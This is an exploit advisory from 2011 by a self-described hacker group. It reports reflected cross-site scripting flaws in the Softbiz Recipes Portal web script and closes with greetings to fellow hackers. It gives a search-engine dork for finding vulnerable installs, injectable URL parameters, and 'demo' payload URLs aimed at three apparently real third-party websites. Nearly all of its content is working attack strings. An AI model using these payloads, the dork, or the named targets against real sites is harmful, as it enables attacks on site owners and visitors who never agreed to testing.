################################ In The Name Of God Iran ############### ######################################## # Exploit Title:Softbiz Recipes Portal Multiple XSS Vulnerabilities # Author: Net.Edit0r # Date : 2011-08-05 # home Page: http://Black-HG.Org ~ http://h4ckcity.Org # Location : Iran # Vendor or Software Link: http://www.softbizscripts.com/ # Contact : Black.hat.tm@Gmail.Com & Net.Edit0r@att.net # Version: N/A # Category:: webapps # Google dork: "Powered by SoftbizScripts" # Tested on: ubuntu 11.04 ~ Linux Back Track 5 #################################################################### # Proof Of Concept [POC] http://site/[path]/admin/index.php?msg=[XSS] http://site/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS] http://site/[path]/signinform.php?errmsg=[XSS] http://site/[path]/msg_confirm_mem.php?errmsg=[XSS] # Demo [POC] http://classifieds-market.net/signinform.php?errmsg="><script>alert(0)</script> http://www.buy-sellcars.com/msg_confirm_mem.php?errmsg="><script>alert(0)</script> http://www.micaregivers.org/caregivers/admin/index.php?msg="><script>alert(0)</script> ######################################################################################### #Greetz To: DarkCoder , Dr.Niloo , Amir-MaGiC , H3x , Cyrus , D3adlY , 3H34N Spical Th4nks: B3hz4d | Cru3l.b0y | M4Hd1 | Mikili | L0phtiran And All My Friendz [ Pentesters.Ir ] , packetstormsecurity.org, 1337day.com ,securityreason.com ########################################################################################## ########################### Persian Gulf 4 Ever ~ I Love Iran And All Iranian People ####